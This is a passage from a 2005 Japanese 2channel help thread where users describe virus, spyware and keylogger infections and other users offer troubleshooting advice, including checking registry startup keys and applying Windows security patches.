を開いたらチェーンメールみたいのが送られてきていた。
【何をしたらそんなことになったのか】 リンクを踏んでしまった。トロイ?
【これまでにとった措置】何もしていない。
【その他の質問】 メールアドレスがばれていないか心配です。
         


316名無しさん@お腹いっぱい。:2005/05/16(月) 00:09:09
>>315
URLをアクセス可能な形で貼りやがって、
質問のフリしたアラシだろおまえ。
317名無しさん@お腹いっぱい。:2005/05/16(月) 00:20:16
>>315
ブラクラの一種。
メールストーム。
たぶんメアドは大丈夫だと思うけど。
318名無しさん@お腹いっぱい。:2005/05/16(月) 00:45:24
昨日からシステムダウンしていた価格コムが報告を出しました
http://www.kakaku.com/

その中で、価格コムのホームページにアクセスした人は
下記のウイルスを取り込んでしまった可能性があると記されています

  trojandownloader.small.AAO
  PSW.Delf.FZ

上記はNOD32における呼称のようです。
他のウイルス対策ソフトではどう呼ばれているか、対応しているかなど
情報をいただきたく思います
319名無しさん@お腹いっぱい。:2005/05/16(月) 00:46:42
正確には「一昨日から」でした
320名無しさん@お腹いっぱい。:2005/05/16(月) 00:46:53
Windows XP HE SP2で、メールソフトはOE使ってます。
メールアドレスはいっさい登録してません。
先日メルマガが数件受信された中に、
1通だけ件名もメールアドレスも表示されないメールがあったんですが、どこかにアドレスが漏れてるとか、ウイルスだったとかそういう可能性ってあるんでしょうかね?
今までの受信メールはいつも件名か、メールアドレスかが表示されていたので、何だか気持ち悪くて開く前に削除しちゃったんですが。
・・・厨な質問ですみません。
321名無しさん@お腹いっぱい。:2005/05/16(月) 18:38:59
WinXPを起動するとThe procedure[any] could not be lcated in the DLL WININET.dll. と表示されてネットに接続できなくなります。 システムの復元しても治らないorz ノートンはなぜか起動できない・・・・ 誰か助けてください!
322名無しさん@お腹いっぱい。:2005/05/16(月) 19:09:41
すいません正確にはIEを使ってネットに接続できないでした
323 :2005/05/16(月) 21:59:27
電話口--------ヤフーモデム-----------PC1 (A接続とします)
     ↑             ↑
    電話線          LANケーブル

でネット接続してます。

これを下記のようにPC1のところをウイルス持ちのPC2に置き換えます。

電話口--------ヤフーモデム-----------ウイルス感染済みPC2(B接続とします)
     ↑            ↑
    電話線          LANケーブル

この接続にした後、再び感染していないPC1をPC2に戻しても
(B接続から再びA接続へ戻す)
PC2からPC1へウイルスは感染しませんか?
感染しませんよね?
モデムやLANケーブルから感染するはずないですよね?
教えてください。よろしくお願いします。
324名無しさん:2005/05/16(月) 22:26:42
ウィルスバスターでウィルスチェックをしたら「js kowai.a」と
「joke button.a」というのを検出したんですが、これってどんな
ウィルスなんでしょうか?
325名無しさん@お腹いっぱい。:2005/05/16(月) 22:59:43
326名無しさん:2005/05/16(月) 23:11:55
>>325
サンクスです。
327名無しさん@お腹いっぱい。:2005/05/17(火) 00:02:09
【使用OS】  Windows Me
【WindowsUpdateしてるか】  してる
【AntiVirusは何を使っているか】  ウイルスバスター2002
【ちゃんとUpdateしてるか】  
借り物なのでしてない…ファイアーウォール機能だけ使ってる感じ
【スキャンした結果(ウイルス名・発見場所)】  しても検出なし(当然)
【別のオンラインスキャンしたならその結果は】
オンラインスキャンが出来ない 
ActiveXを有効にしても「無効になっている」のメッセージが出る
【症状を具体的に、分かる限りすべて書く】
最初名前が「~」のファイルがデスクトップに出た。
以降、立ち上げた後CPUの使用率がすぐ100%になる。
(使っていれば良いが、5分ほど放置すればOUT)
デスクトップの分とあわせて検索して、OEで発見した「~」ファイルを削除。
一ヵ月後また「~」ファイルが出てきたので同じ作業。
あれから出ファイルはてこないがCPU100%の症状は変わらず。
他に、システムの復元が出来ない。オンラインスキャンが出来ないなど。

【何をしたらそんなことになったのか】
リンクアドレスを踏みました
【これまでにとった措置】
上記のほかにスパイボットで検索して検出したスパイウェアを
三つ取り除いた(重たかったけどスパイボットは動いた)
【その他の質問】
もうリカバリするしか無いでしょうか、リカバリ後に元に戻るでしょうか?
(それより随分弄ってるからどうやって復元していいのやら…)

スレ違いだったらごめんなさい。
328名無しさん@お腹いっぱい。:2005/05/17(火) 05:47:05
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    |
     |        |        |   |
     |        | ∧_∧ |   |
     |        |( ´∀`)つ ミ |
     |        |/ ⊃  ノ |   |   Windows Me
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |
329名無しさん@お腹いっぱい。:2005/05/17(火) 09:40:25
>>323
大丈夫
330名無しさん@お腹いっぱい。:2005/05/17(火) 12:58:17
>>323
問題なし

>>327
>【AntiVirusは何を使っているか】ウイルスバスター2002
>【ちゃんとUpdateしてるか】借り物なのでしてない…ファイアーウォール機能だけ使ってる感じ

リカバリーして自分の金でセキュリティソフト買え
331 :2005/05/17(火) 18:55:26
>>329>>330
サンクス!
そうだよね〜自分も大丈夫だと思っていたのだけど
ヤフーとPCメーカーに問い合わせたところ、
両者から「感染の可能性は否定できない、しないほうが良い」
と言われた。

そんなことありえるの?
じゃあ、ホテルとかでノートPCでネット回線使えないよね?
332名無しさん@お腹いっぱい。:2005/05/17(火) 19:33:23
>>331
PC1とPC2の間での感染に限定するなら「有り得ない」。
それぞれ個別に考えると、ヤフーモデムがルーター機能持ってなければ
IPマスカレードによる簡易フィルタが無いことになるから、
下手するとネットワーク感染型ワームに引っかかる可能性はあるな。
333 :2005/05/17(火) 19:54:17
>>332
お早いレス、ありがとうございます。
せっかく詳しく答えて頂いたのに、
私があまりに無知でよく意味がわかりません。

要するに可能性としてはモデムを媒体として
PC2のウイルスがPC1に感染する可能性が
あるということでしょうか?

ちなみに
PC2は現在、ノーガードのセキュリティーでウイルス持ち状態(マカフィ期限切れ)。
PC1はウイルスバスター最新版にアップデート済みでウイルス皆無の状態です。

もしよろしければもう少しご意見をお聞かせください。
334≠332:2005/05/17(火) 20:06:26
>>333
いや、PC1→PC2の感染は無い。それぞれ別個にネットに繋いだとき
にノーガードだったらという話。
ネットに繋いだだけで感染するワームがあったりするんだけど、
細かいことは省くけど、ルーター入れてるとか、PC1のバスターの
パーソナルファイアーウォールが有効になってるんなら、心配要らない。
335名無しさん@お腹いっぱい。:2005/05/17(火) 20:07:01
>>333
>>332がいっているのはPC2のウイルスがうつるってことじゃなくて、
PC1のガードがしっかりしてないと接続中にインターネット側から
やられる可能性があるってことじゃないの?

それからウイルス飼ってないでさっさと退治しろよw
336名無しさん@お腹いっぱい。:2005/05/17(火) 20:14:26
>>333
> 要するに可能性としてはモデムを媒体として
> PC2のウイルスがPC1に感染する可能性が
> あるということでしょうか?

この点については
> PC1とPC2の間での感染に限定するなら「有り得ない」。
これで否定してる。

ヤフーモデムの仕様によるが、複数台を繋げるルーター機能を持っていない場合、
電話口--------ヤフーモデム-----------PC
     ↑             ↑
    電話線          LANケーブル
ここで、インターネットからのアクセスをヤフーモデムはPCに通してしまう。
この場合、「悪意を持ったアクセス」も通すことになるので、
PCが何も対策を取っていなければウイルス感染やクラッカーの侵入が可能。

ヤフーモデムが複数台のPCを繋いで
ヤフーモデム---HUB---PC
            └---PC
という構成が可能な機能を持っているなら、
いきなり外部(インターネット)から接続しようとする通信は
ヤフーモデムの段階で行き場を失う
(ヤフーモデムがどのPCを宛先とした通信なのか判断できないので通信を破棄する)ため、
悪意を持ったアクセスをある程度遮断できる。
もちろん「ある種の通信を特定のPCに転送する設定」をしていなければ、だけど。
337 :2005/05/17(火) 20:28:48
>>334>>335
お優しいお二人、ご回答ありがとうございます。

私がやりたかったのは
ウイルス持ちのPC2をネットに繋げて(>>323の接続Bにして)
avast!という無料アンチウイルスソフトをダウンロードして
ウイルスを駆除しようと考えてたもので・・・

ヤフーのレンタルモデム(Trio1)はルータ機能あるのでしょうかね?

すみません。
私の質問は掛算がわからない子供が微分方程式に挑んでるようなものですね・・・

もしうんざりされてるのならスルーして頂いてけっこうです。
もし気が向いたらご回答ください。
338 :2005/05/17(火) 20:35:34
>>336
おお!!書き込んでるうちに新たな回答が!
なんか意味がわかってきました。
手間隙かけて丁寧に説明していただいて誠にありがとうございます。

でも自分のヤフーモデムがどういうタイプ(ルーター付かどうかなど)か
がわからない・・・
やはり掛算がわからない子供のようです・・・
無知はダメですね。
339 :2005/05/17(火) 20:45:48
>>336
ヤフーモデムが複数台のPCを繋いで
ヤフーモデム---HUB---PC
            └---PC
という構成が可能な機能を持っているなら、

この機能があるのかが不明です。
HUBは蛸足みたいなものですよね?
HUBは使っていないのですが・・・

なんか大丈夫そうだけど、危険なような気もするし・・・
微妙だなあ・・・

みなさんご回答ありがとうございました。

2ちゃんにも優しい方はおられるのですね・・・
340名無しさん@お腹いっぱい。:2005/05/17(火) 20:55:53
>>339
HUB---PC 
 └---PC 

これをやるのがルーターってことね。
んで、Trio1にはルーター機能は無いみたい。
用語とかでわからないことは、まずは
ttp://www.google.co.jp/
で調べる。それでわからなかったらここで聞くと
優しい人が答えてくれる(かもしれない)。
341 :2005/05/17(火) 20:59:58
もう一度みなさんのお教えをよく読んでみますと、
PC1のセキュリティがしっかりしてれば、一時的にウイルス持ちのPC2
を繋いでも、感染はしなさそうですね?

違いますかね?
342 :2005/05/17(火) 21:04:37
>>340
何度もご親切にありがとうございます。
ってことはTrio1にルーター機能がないからけっこうこの行為(接続B)は危険と言うことですね。
PC難しい・・・
343名無しさん@お腹いっぱい。:2005/05/17(火) 22:23:36
【使用OS】 windowsXP
【WindowsUpdateしてるか】 していません
【AntiVirusは何を使っているか】  ノートンインターネットセキュリティ
【ちゃんとUpdateしてるか】  5/16更新済み

【その他の質問】
上記のような環境で定期的に所有パソコンをチェックしています。
メールはgooのフリーメールを使っていますが
オークションの取引相手から「ウィルスメールが増えた」と連絡がありました。
このような環境で相手先にウィルスメールが届くことはあるのでしょうか。
受信サーバには不信なメールは届いていません。
ご存知の方がいらっしゃればよろしくお願いいたします。
344名無しさん@お腹いっぱい。:2005/05/17(火) 22:59:51
>>343
単に「ウイルスメールの受信が増えた」って事を知らせてくれただけであれば親切に感謝して終わり。

そうでなく、発信元じゃないかと疑われてるのであれば
1.ノートン(定義ファイル最新)で全ドライブ検索。
2.別メーカーのオンラインスキャンで全ドライブ検索。

これで何も検出されなければ、
上のような方法で確認したこと、
別の原因によるものではないかということを
誠意を持って伝える。

それでも相手がゴチャゴチャ言ってくるようなら、
変なのと関わり持っちまったってことだな。
345名無しさん@お腹いっぱい。:2005/05/18(水) 01:24:01
>>344
windows updateもしてないのに、変なのとかかわりっていうより、
自分がかなり変だろ。
346名無しさん@お腹いっぱい。:2005/05/18(水) 01:37:01
>>182と同じ、
10GBのupdate00*.logが15分ごとに生成される状況です。
一応[>>256 >>263]

コマンドのfsutil file createnewを悪用したものらしいのですが、
具体的な対処が思いつきません。
どなたかご教授ください。
347:2005/05/18(水) 01:40:20
【使用OS:Windows XP】
【WindowsUpdate:はい】
【AntiVirus:ウィルスバスター】
 ・アップデートしてあります。
348名無しさん@お腹いっぱい。:2005/05/18(水) 01:52:23
>>345
そういやそうだな。
そこは見落としてた。
349名無しさん@お腹いっぱい。:2005/05/18(水) 11:51:45
age
350名無しさん@お腹いっぱい。:2005/05/18(水) 12:38:43
カカクコムに感染したウィルスってアバストさん対応してますか?
351名無しさん@お腹いっぱい。:2005/05/18(水) 14:11:47
antidoteにかけたらウィルスが見つかりました。
74 C:\WINDOWS\Downloaded Program Files\Software_Plugin.exe = ウイルス感染 : Trojan-Downloader.Win32.Swizzor.au

ttp://www.f-secure.co.jp/v-descs/v-descs3/swizzor.htm
ここによると検知したファイルをハードディスクから削除するだけで
駆除できるらしいのですが、
Downloaded Program Filesというフォルダは特殊なフォルダらしく
当該ファイルが見つかりません。
対処をご教示くださいませ。お願いします。
352名無しさん@お腹いっぱい:2005/05/18(水) 14:23:53
教えてください。


【使用OS】 WIN XP
【WindowsUpdateしてるか】 
している
【AntiVirusは何を使っているか】
期限切れて今は使っていない
【ちゃんとUpdateしてるか】
していない
【スキャンした結果(ウイルス名・発見場所)】
AD-AWAREにてスパイウェアが50個ほど見つかった。
【別のオンラインスキャンしたならその結果は】
AD-AWAREのみ
【症状を具体的に、分かる限りすべて書く】
会社のPCが重くなっているようなきがする。
先輩のPCはネットにつながらないこととかが多い。
【何をしたらそんなことになったのか】
多分先輩がエロサイトを頻繁にみてたからorz
【これまでにとった措置】
AD-AWAREで検索→削除
353名無しさん@お腹いっぱい:2005/05/18(水) 14:24:42
【その他の質問】
システム会社の人がスパイウェアに感染されてることを
教えてくれて、何とか自分でやろうと思ったので、
(有料だと何万もかかるので)AD-AWAREを起動して
検索→削除 をしたのですが、そしたら、システム会社の人に

「スパイウェアにかかっている端末なのですが
そのまま触らずに、普通に使っていてください。
AD-Aware の削除機能等は絶対に使わないでください。
Windowsが起動しなくなったり、破損する事例が
あります。」

といわれました。

質問の1つは
こういうのは有料でプロにお願いしたほうがいいってことですか?
ということと、

AD-AWAREを起動→検出→削除 では
次の日になると1つぐらいはまた出てしまうのですが・・・
(VALUE なんとかって書いてありました)
防御も大切ですよね?やってないので何かフリーソフトで
いいのがあれば教えてください。

よろしくお願いします。
354名無しさん@お腹いっぱい。:2005/05/18(水) 14:34:07
>>353
SpywareBlaster
355名無しさん@お腹いっぱい:2005/05/18(水) 14:38:25
>354 ありがとうございます。
それはフリーソフトのことですね?入れてみます!

もうひとつ、AD-AWAREを起動→検出→削除をやってはダメ!って
システム会社にいわれたのですが(自分たちでやるから・・・って)
AD-AWAREのスパイウェアの削除は有料でやってもらったほうがいいんですか?
なんか言いくるめられてるような気がしてならないんですけど・・・
356名無しさん@お腹いっぱい。:2005/05/18(水) 15:33:09
>>355
そんなおまいに簡単な使い方。
SpywareBlaster3.4起動 -> Update -> Protection -> Enabled All Protection
はいこれで終わり。原理的にはレジストリ経由でIEの制限サイトにスパイウェアとかあぶない系のサイトのURLを登録する。
Mozilla/Firefoxにも対応しているからいいよ。さらに詳しく知りたいのならばSpywareBlasterスレのテンプレ見るにだ

常駐させなくても(・∀・)イイ!! SpywareBlaster 7
http://pc8.2ch.net/test/read.cgi/sec/1112251719/
357 :2005/05/18(水) 16:23:32
無料アンチウイルスソフトはみなさん何がおすすめですか?
無料のソフトはノートンやウイルスバスターより性能が落ちますよね?
落ちるのなら、どれくらい落ちるのでしょうか?
また、無料で日本語対応してるのってavast!くらいですかね?
358名無しさん@お腹いっぱい。:2005/05/18(水) 16:44:42
>>357
だいたい、大手が85%〜90%のカバー率で、
AVGやavastは50
359323 :2005/05/18(水) 17:37:03
例のウイルス感染PCの接続の相談の続きです。
みなさん、ご親切にご回答ありがとうございました。

あれから各会社に問い合わせたところ、
ヤフー、PCメーカー@、PCメーカーAの三社は「感染の可能性あり」との見解でした。
ところがウイルスバスターのTREND社は「感染しない」と断言しました。
(それで感染するなら、不特定多数の使うホテルとかのネット
接続サービスが誰も使えないとも言っていた)
う〜ん・・・
誰を信じればいいのか・・・
ウイルスの専門家のTREND社か、それともヤフーや二つのPCメーカーの言うことか・・・
頭は混乱するばかりです。
もしよろしければ、引き続き、だれかご意見をください。

粘着、申し訳ありません。
360名無しさん@お腹いっぱい。:2005/05/18(水) 18:35:13
361名無しさん@お腹いっぱい。:2005/05/18(水) 18:37:54
362名無しさん@お腹いっぱい。:2005/05/18(水) 18:54:53
>>359
ここでさんざん回答もらってる(めちゃくちゃ丁寧に解説までしてもらって)にも係わらずだ、
あんたはそれが信用出来なくて4社に問い合わせたわけだろう?
つ〜ことはだ、この先ここでどういう回答を得ても、やっぱりあんたは何も信用しないってことだ

納得がいく答えが出るまで自分で調べればいいだろ
回答してくれた方達にすげー失礼だわ、あんた
363名無しさん@お腹いっぱい。:2005/05/18(水) 19:16:52
>>359
個人所有のパソコンじゃないのならあなたがやっている事は、
十分に社内規約に違反しているはず
個人所有でも、社内のネットワークに接続するパソコンなら、それも違反
Ad-awareは、企業ユーズはフリーじゃ認めていないからこれも違反

それに、社内には十分な知識があっ、
判断と責任を持たされている人がいなくて
外部に委託してしまっているようだから、その結果、
何かあったらあんたはクビ
364名無しさん@お腹いっぱい。:2005/05/18(水) 19:18:44
まぁ>>359がクビになろうとどうなろうと、ぶっちゃけ俺等にはどうでもいいんだがな。
365323:2005/05/18(水) 19:19:49
>>362
おっしゃる通りですね。
回答してくださった方に失礼でした。
本当に申し訳ありませんでした。
反省します。ごめんなさい。

でも真相はどうなのだろう・・・
TREND社だけが見解が違うのって・・・
皆さんのご意見も説得力があってどれが正しいのかよくわからない・・・
366名無しさん@お腹いっぱい。:2005/05/18(水) 19:34:23
>>365
感染するわけあんめ バカ
その中でソフトウェアと言ったら、モデムのファームウェアくらいだ
367名無しさん@お腹いっぱい。:2005/05/18(水) 22:27:28
【使用OS】 WIN XP
【WindowsUpdateしてるか】 
している
【AntiVirusは何を使っているか】
ノートン2005
【ちゃんとUpdateしてるか】
している
【スキャンした結果(ウイルス名・発見場所)】
Trojan.Jasbom
【別のオンラインスキャンしたならその結果は】
してない
【症状を具体的に、分かる限りすべて書く】
症状は特になし。
【何をしたらそんなことになったのか】
価格コムを見た
【これまでにとった措置】
ノートンの対応を処理をとった

学校で、自分のPCのみウィルスに感染しました。
学校はLANでつながっていて?(ゲートウェイで共有接続?)となっていたのですが
学校のインターネットサーバにもウィルスが感染してしまったのでしょうか?
また、感染してしまっている可能性はありますか?
よろしくお願いします。
368名無しさん@お腹いっぱい。:2005/05/18(水) 22:44:39
>>367
大丈夫だと思う。
369名無しさん@お腹いっぱい。:2005/05/18(水) 23:01:53
>>367
しかし、なんで学校のPCを私用で使うわけ?
大丈夫ですかって聞く前に教授なり講師に知らせろよ。
370名無しさん@お腹いっぱい。:2005/05/18(水) 23:04:51
>>367
>学校のインターネットサーバにもウィルスが感染してしまったのでしょうか?

今のところ、LAN経由でサーバーに感染させるというのは書いていない。
ただ、「現在のところ」ということだ。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

それに、万一感染してしまっていても、お前にはどうすることも出来ない。
しかるべく「管理者」が対処するだろう。

オレのところでも、価格.コムを見たらしいウイルス感染者がいた。
バスターを入れていたのにどうして?と不思議がっていた。

>367の出来ること。
自分のPCであれば、WindowsUpdateを怠らないことくらい。
学校のPCなら、管理者さんにお任せする以外はない。
371名無しさん@お腹いっぱい。:2005/05/18(水) 23:42:56
>>369
>しかし、なんで学校のPCを私用で使うわけ?
PCに関しての情報が見れるサイトは別に見てもいいのです。
授業で使うことがあるので。

>大丈夫ですかって聞く前に教授なり講師に知らせろよ。
明日知らせることにします。

>>368,370
ありがとうございます。
そうですね、ワタシ自身は何もできないのですよね。

インターネットって不思議ですよね。
最初に、サーバーのPCを通して自分のノートPCでサイトを見るのに
根元は感染せず、自分が感染するなんて。
ホント、不思議です。

DQNな私の質問に答えてくださってありがとうございました。
372名無しさん@お腹いっぱい。:2005/05/18(水) 23:58:29
気にしないで。かわいいよDQNでも。
373名無しさん@お腹いっぱい。:2005/05/19(木) 00:53:27
2チャンのスレッドがハッキングされてウイルス感染するってことあるの?
アダルトVのヤフーオークション11スレを開くとVBS-NETWORKとかのウイルスに感染するみたいだが
http://pie.bbspink.com/test/read.cgi/avideo/1107722630/l50
374名無しさん@お腹いっぱい。:2005/05/19(木) 01:08:21
>>373
理論的にはあり得るね。
前々から、2chの専ブラに対するバッファーオーバーフロー攻撃については予言されてたし。
Gzipがらみでもセキュリティホールが空いたこともあったし。

問題は、管理された2chのスレッドより、2ch以外の
データー互換の2ch形式掲示板だろうね。

気軽に読みに行くと専ブラが読み込むんだけど、中身はウィルスを入れ込む
バッファーオーバーランタイプのスレッドを仕込んであったりして。
そこいらへんの緊張感は持ってたほうがいいと思うよ。
375名無しさん@お腹いっぱい。:2005/05/19(木) 01:12:29
補足
例えば、gzip形式のdatファイルを取り込んで、
これをhtmlに整形して吐き出して、IEに渡すわけだけど、
あくまでも専ブラはdatファイルの中身は正しいものとして
処理してるから、ここに単純にスクリプトを入れておけば
感染させることは可能になる。

もちろん、データーチェックで弾かれるのが
ほとんどだから、あり得ないと言うかもしれないけど、
全ての専ブラがチェックをしてる保証は無いわけだしね。
376名無しさん@お腹いっぱい。:2005/05/19(木) 01:12:57
>>374
現在ヤフーオークション11を開くたびにノートンが
ウイルス感染&削除を宣言します。
377名無しさん@お腹いっぱい。:2005/05/19(木) 01:42:23
>373>376
ここを見れ初心者君
ttp://pc8.2ch.net/test/read.cgi/sec/1115655502/3
378名無しさん@お腹いっぱい。:2005/05/19(木) 01:53:28
おかしなexeを起動したら夏色こみゅにけーしょんって言われて
IEとoutlook以外のexe全部消されました(´゚∀゚`)ウェハハハハ
379名無しさん@お腹いっぱい。:2005/05/19(木) 01:56:17
[email protected]関係のウィルスメールが大量に来てるんだけど・・・
なんかやばいのかな。
380 :2005/05/19(木) 02:32:13
【使用OS】
winXP
【WindowsUpdateしてるか】
していない
【AntiVirusは何を使っているか】
ノートンシステムワーク2003
【ちゃんとUpdateしてるか】
今年の3月まではしていた
【症状を具体的に、分かる限りすべて書く】
ネットをしようと回線をつないでしばらくインターネットをしていると急にメールを大量に送りだします
ネットを切断すると送るのが止まります
メールソフトはOEを使っているんですが送信済みフォルダには
送った形跡がなにも残っていません
メールを急に送り出す時にOEは起動しないのでOEから送ってないのかもしれません
【何をしたらそんなことになったのか】
昨日急になったので原因はいまいちわかりませんが
ノートンを切ってあるのを忘れてそのままアダルトサイトを見たのがもしかしたら原因かもしれません
それか最近メールで外国語の件名で添付ファイルがあるものがきているので
それが原因かもしれません
でもメールの添付ファイルを開いた記憶はないです
【これまでにとった措置】
シマンテックで配布しているW32.Sober[B-G.I.L.N.O]RemovalToolと
W32.Netsky FixToolというのを試してみましたが両方とも感染していないという結果でした

よろしくおねがいします
381名無しさん@お腹いっぱい。:2005/05/19(木) 02:35:07
>>380
いずれにしても、正式版を買ってからだろうね。話は。
382名無しさん@お腹いっぱい。:2005/05/19(木) 02:39:34
>>380
なんで「急にメールを大量に送りだ」してるのが分かるんだ?
つうか、メール送りまくってるのが分かってるのなら
さっさとネットワークケーブル引っこ抜け。
人に迷惑かけない状態にした後でネットに繋ぐ手段見つけて相談しる。
ネットカフェでも携帯でもいいから。
383380:2005/05/19(木) 02:46:50
>>382
急にシマンティックのメールスキャンのようなものが始まるんです
それが大量に始まって100%になって送っている(のかな?)のや
エラーとなって送れませんでしたというのがでます
始まってしまったら即刻切断しています
384名無しさん@お腹いっぱい。:2005/05/19(木) 03:11:23
>379
ウチにも大量に届いてる.何なんだろ?
385名無しさん@お腹いっぱい。:2005/05/19(木) 03:36:50
XP使ってるパソコン初心者です。3日前ぐらいから
winny2使ってエッチなファイルおとしてウイルスに感染しちゃいました。
フリーのAVGとかいうソフトでスキャンしたところ、1247個の
ファイルが感染してます。ウイルス名は『Win32/Parite』とかいうやつで
どうもexeファイルほとんど感染しちゃってます。

それでAVGとかいうやつで駆除してるんですが、一個一個修復ボタン
を手動で押さなきゃいけないみたいなんで、大変なんです。だからといって
一気に削除するのも怖いし・・この手のウイルスを
自動的に削除じゃなくなるだけ修復してくれる
ようなウイルス対策ソフトあります??良かったら教えてください
それとも、もうこれだけ感染しちゃってると手遅れなのかな・・^^;

386名無しさん@お腹いっぱい。:2005/05/19(木) 03:40:50
> winny2使ってエッチなファイルおとしてウイルスに感染しちゃいました。
自業自得
387名無しさん@お腹いっぱい。:2005/05/19(木) 03:52:43
>>385
俺も自業自得だと思うが、ファイル共有していて
オンラインスキャンしてない方がありえない。
388名無しさん@お腹いっぱい。:2005/05/19(木) 07:47:01
【使用OS】 XP PRO SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 eTrust Antivirus 7.0
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 検出せず
【別のオンラインスキャンしたならその結果は】
バスターのオンライン、NOD32体験版でチェックいずれも検出せず。ノートンで2chログが反応しただけ。
Spybotでもスキャンしましたが何も見つからず。

【症状を具体的に、分かる限りすべて書く】
2〜3日前から15分置き位にrundll.exeがmembers.chello.nlにFTPで送信しようとしてるとOutpostが警告を出す。

【何をしたらそんなことになったのか】
推測ですが串を試していたときl飛ばされたページにchelloのロゴが表示されたのでmembers.chello.nl関係の
ページに飛ばされこのときに何かあったのかと。

【これまでにとった措置】 Outpostで防いでいます
【その他の質問】
Outpostを入れたのが最近でその前から送信していたのか上記の時にそうなってしまったのかが分かりません。
トロイのWINIS.EXE関係かとも思ったのですがレジストリ、システムディレクトリとも痕跡がありませんし
スキャンしても何も見つからないのでこれではないと思います。
members.chello.nl rundll.exeでぐぐってみてもドイツ語?かなにかのページが2件ほど見つかるだけで
情報がありません。
スキャンしても何も見つからず、だけれど何かを送信しようとしているので気味が悪いですし、
rundll.exe自体をブロックしているのでFTP関連で支障が出ないか心配です。
389名無しさん@お腹いっぱい。:2005/05/19(木) 08:13:32
超初心者ですがお教えください
「MS04-13の脆弱点に対するパッチが適用されている場合は感染しません。」
とかよく書かれていますが、そのパッチが適用されたかどうかは
どうすればわかるのでしょうか?
390名無しさん@お腹いっぱい。:2005/05/19(木) 08:31:36
>>388
SP2なのでインターネットオプションのプログラムタブ
アドオンの管理でIEに変なものが組み込まれていないかをまず確認
system32フォルダ内にあるのそれらの登録されている.dllを全部調べてみる
プロパティから作成日時やマイクロソフトのファイルかどうかで判断する

異常がなさそうなら、rundll.exe経由で起動されてそうなので、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
レジストリのこの場所を確認してみる
391名無しさん@お腹いっぱい。:2005/05/19(木) 08:51:46
>>379
メールアドレス等の個人情報をばらまいてるなあ。
392388:2005/05/19(木) 09:28:20
>>390
rundll.exeを見てみるとタイムスタンプが5月18日と昨日の日付になっていたので、あれ?と思い
バイナリエディタで覗いてみるとArdamax Keyloggerという記述がorz
それ関連のdllも見つかりました。
どうやらキーロガーを仕込まれてるっぽいです。
しかし相変わらずスキャンしても反応無し・・・・・・

ブラウザのアドオンでよく分からないのが
ブラウザ拡張で名前が「リサーチ」 関連ファイル無し。発行元も空欄。
です。
393388:2005/05/19(木) 09:33:00
追記
すいません、最初に書いておいた方が良かったですね。
レジストリのスタートアップ関連は真っ先に調べました。
すべて把握済みの物で怪しい物はありませんでした。
394388:2005/05/19(木) 09:48:29
何度もすいません。
HijachThisで調べたら「リサーチ」はExcelの拡張でした。
395名無しさん@お腹いっぱい。:2005/05/19(木) 10:10:31
>>388
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
じゃあ、こっちにあるかもしれないね
396名無しさん@お腹いっぱい。:2005/05/19(木) 10:11:51
昨晩から、[email protected]のアドレスで大量のウイルスメールが届いています。
丸善で何かあったのかな・・・
397名無しさん@お腹いっぱい。:2005/05/19(木) 10:18:31
>>396
ウェブサーバの感染か、丸善のメールアドレスが残っているサイト閲覧者のウィルス感染か?
後者だったらしばらくの間は届くだろうね
398名無しさん@お腹いっぱい。:2005/05/19(木) 10:24:07
丸善のメルマガ配信停止したけど、まだウイルスメールが[email protected]から届きます
399名無しさん@お腹いっぱい。:2005/05/19(木) 10:29:07
>>398
送信元のIPアドレスをWHO.ISで調べて見て
ソースを表示して、recieved fromのところね
400名無しさん@お腹いっぱい。:2005/05/19(木) 10:35:54
>>398
だから、丸善から届いてるんじゃなくて、ウィルスが丸善を装って出してきてるんだよ。
本当の感染者がウィルスに対処するまで届き続けるよ。
ウィルスの種類が違うかも分からないが、以下参考に

【差出人】WORM_NETSKY【詐称】
http://pc8.2ch.net/test/read.cgi/sec/1080741342/
401名無しさん@お腹いっぱい。:2005/05/19(木) 10:36:23
Received: from mailgate2.maruzen.co.jp by gatekeeper2.maruzen.co.jp

丸善のサーバーからウイルスメールを発信してるってことなのかな
402名無しさん@お腹いっぱい。:2005/05/19(木) 10:42:49
>>401
IPアドレスがどこに所属しているものなのか調べて推測するしかない
まあ、大体は偽装されていないと思うよ
403名無しさん@お腹いっぱい。:2005/05/19(木) 10:43:37
>>401
自分のIPアドレスを隠して、残りをきちんと貼れよ。
あと、名前欄も誰か分かるように入れとけ。
404名無しさん@お腹いっぱい。:2005/05/19(木) 13:42:14
>>389
超初心者なら、WindowsUpdateにアクセスして
「優先度の高い更新プログラム」(XPの場合の表示)が全くない状態にしておけ。
それからOfficeアップデート、MSNメッセも使ってるならアップデート。
それで該当パッチも含めて現時点でマイクロソフトがリリースしてる
危険なセキュリティホールは大方潰せるはず。
405名無しさん@お腹いっぱい。:2005/05/19(木) 14:02:13
>>389
いやすまん、更新云々じゃなくて適用されてるかどうかってことね。
WindowsXPはSP2に含まれてるから、SP2にしてれば問題無し。
http://support.microsoft.com/kb/811113

XP SP2でないなら、ここの「更新プログラムが正しくインストールされたかどうか確認する方法」を参照。
ttp://www.microsoft.com/japan/technet/security/bulletin/MS04-013.mspx
406名無しさん@お腹いっぱい。:2005/05/19(木) 14:44:53
>>396-403
電子メール大量配信についてのご報告とお詫び
http://mis.maruzen.co.jp/cgi-bin/mis2005?Cgifrom=m2-gud-11

丸善が発信元だったようだな。
407名無しさん@お腹いっぱい。:2005/05/19(木) 14:47:33
>弊社のサーバがウィルス感染した事実はございませんので
丸善からウィルスメール届いたという人は、使ってるアンチウィルスと検出名書いてくれないかな。
408名無しさん@お腹いっぱい。:2005/05/19(木) 14:47:52
Outlook Express 用の累積的な修正プログラム (837009) (MS04-013)

脆弱性の詳細
MHTML URL のプロセスの脆弱性 - CAN-2004-0380:
特別な細工がされた MHTML URL が処理される方法に、リモートでコードが実行される脆弱性が存在します。
それにより、Internet Explorer のマイ コンピュータのセキュリティ ゾーンで攻撃者の HTML コードが実行される可能性があります。
これにより、攻撃者によって該当のコンピュータの完全な制御が取得される可能性があります。

